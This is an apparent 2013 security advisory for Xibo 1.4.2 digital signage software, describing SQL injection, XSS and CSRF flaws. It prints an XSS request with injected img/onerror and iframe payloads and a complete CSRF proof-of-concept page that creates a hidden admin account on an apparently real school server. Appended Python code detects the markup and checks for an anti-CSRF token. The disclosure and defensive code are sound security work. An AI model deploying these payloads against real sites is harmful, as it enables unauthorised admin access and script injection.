Wednesday, August 21, 2013

[Exploit] Xibo - Digital Signage SQL Injection, XSS, CSRF

# Title: Xibo - Digital Signage SQL Injection, XSS, CSRF
# Discovered and Reported: July 2013
# Discovered/Exploited By: Jacob Holcomb/Gimppy, Security Analyst @ Independent Security Evaluators
# Exploit/Advisory: http://infosec42.blogspot.com/
# Software: Xibo 1.4.2 - http://xibo.org.uk/get-xibo/
# Version Tested: Xibo 1.4.2 (Other versions were not tested and may be vulnerable.)
# CVE: SQL Injection - CVE-2013-4887, XSS - CVE-2013-4888, CSRF - CVE-2013-4889

SQL Injection Vulnerability - CVE-2013-4887

Figure 1 - JSON error

Figure 2 - Xibo application log containing the SQL error that corresponds to the JSON error

Figure 3 - JSON data containing the result of a successful SQL query

Figure 4 - Client-side HTML code was modified to reflect the query demonstrated in Figure 3


Cross-Site Scripting (XSS) Vulnerability - CVE-2013-4888

POST: /index.php?p=layout&q=add&ajax=true
Data: layoutid=0&layout=Gimppy%3Cimg+src%3D42+onerror%3D'alert(%22InfoSec42%22)'%3E&description=%3Ciframe+src%3D'http%3A%2F%2Fsecurityevaluators.com'+width%3D1000+height%3D1000%3C%2Fiframe%3E&tags=&templateid=0

Figure 5 - JSON data indicating a successful request

Figure 6 - Rendered page containing injected HTML iframe and img tags


Cross-Site Request Forgery (CSRF) Vulnerability - CVE-2013-4889

The following JavaScript PoC will create an Xibo administrative user and also set the XSS payloads discussed above.

<html>
<head>
<title> Xibo - Digital Signage 1.4.2 CSRF Exploit.</title>
<!--
# CSRF Discovered by: Jacob Holcomb - Security Analyst @ Independent Security Evaluators
# Exploited by: Jacob Holcomb - Security Analyst @ Independent Security Evaluators
# CVE: CSRF - CVE-2013-4889, XSS - CVE-2013-4888
# http://infosec42.blogspot.com
# http://securityevaluators.com
-->
</head>
<body>
<h1>Please wait... </h1>
<script type="text/javascript">
//Add super user
function RF1(){
    document.write('<form name="addAdmin" target="_blank" action="http://xibo.leland.k12.mi.us/index.php?p=user&q=AddUser&ajax=true" method="post">'+
    '<input type="hidden" name="userid" value="0">'+
    '<input type="hidden" name="username" value="Gimppy">'+
    '<input type="hidden" name="password" value="ISE">'+
    '<input type="hidden" name="email" value="Gimppy@infosec42.com">'+
    '<input type="hidden" name="usertypeid" value="1">'+
    '<input type="hidden" name="groupid" value="1">'+
    '</form>');
}

//Set XSS Payloads
function RF2(){
    document.write('<form name="addXSS" target="_blank" action="http://xibo.leland.k12.mi.us/index.php?p=layout&q=add&ajax=true" method="post">'+
    '<input type="hidden" name="layoutid" value="0">'+
    '<input type="hidden" name="layout" value="Gimppy<img src=42 onerror=\'alert(42)\'>">'+
    '<input type="hidden" name="description" value="<iframe src=\'http://securityevaluators.com\' width=100 height=1000></iframe>">'+
    '<input type="hidden" name="tags" value="">'+
    '<input type="hidden" name="templateid" value="0">'+
    '</form>');
}

function createPage(){
    RF1();
    RF2();
}

function _addAdmin(){
    document.addAdmin.submit();
}

function _addXSS(){
    document.addXSS.submit();
}

//Called Functions
createPage();

// Submit the two forms half a second apart (delays are in milliseconds;
// a leading zero would make the literal octal, so plain 500 is used)
for (var i = 0; i < 2; i++){
    if(i == 0){
        window.setTimeout(_addAdmin, 500);
    }
    else if(i == 1){
        window.setTimeout(_addXSS, 1000);
    }
    else{
        continue;
    }
}
</script>
</body>
</html>
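As an added example (not code from the advisory or from Xibo), the following Python decodes the layout/add request body shown above, reports which free-text parameters carry HTML tags or on* event handlers, produces the entity-escaped values a fixed server would store instead of raw markup, and checks for a per-session anti-CSRF token. The `csrf_token` parameter name is an assumption, since the page does not show Xibo's own.

```python
import hmac
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs

# POST body of the advisory's XSS request to index.php?p=layout&q=add&ajax=true
SAMPLE_BODY = (
    "layoutid=0&layout=Gimppy%3Cimg+src%3D42+onerror%3D'alert(%22InfoSec42%22)'%3E"
    "&description=%3Ciframe+src%3D'http%3A%2F%2Fsecurityevaluators.com'+width%3D1000"
    "+height%3D1000%3C%2Fiframe%3E&tags=&templateid=0"
)
# Free-text parameters of layout/add that the admin UI later renders
TEXT_FIELDS = ("layout", "description", "tags")

class _TagCollector(HTMLParser):
    """Collects start-tag names and any on* (event handler) attribute names."""
    def __init__(self):
        super().__init__()
        self.tags, self.handlers = [], []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.handlers += [name for name, _ in attrs if name.startswith("on")]

def decode_body(body):
    """URL-decode a form body into {param: first value}, keeping empty params."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}

def find_markup(fields):
    """Map each text field containing HTML tags to (tag names, handler attrs)."""
    hits = {}
    for name in TEXT_FIELDS:
        value = fields.get(name, "")
        if "<" in value:
            parser = _TagCollector()
            parser.feed(value)
            parser.close()  # flush an unterminated tag such as the iframe above
            if parser.tags:
                hits[name] = (parser.tags, parser.handlers)
    return hits

def escape_fields(fields):
    """Entity-encode the text fields so they render as literal text, not markup."""
    return {k: html.escape(v, quote=True) if k in TEXT_FIELDS else v
            for k, v in fields.items()}

def csrf_ok(fields, session_token, param="csrf_token"):
    """True only if the form carries the session's token (param name assumed)."""
    return hmac.compare_digest(fields.get(param, ""), session_token)
```

The advisory's forged forms send no token at all, so `csrf_ok` rejects them regardless of what the XSS fields contain.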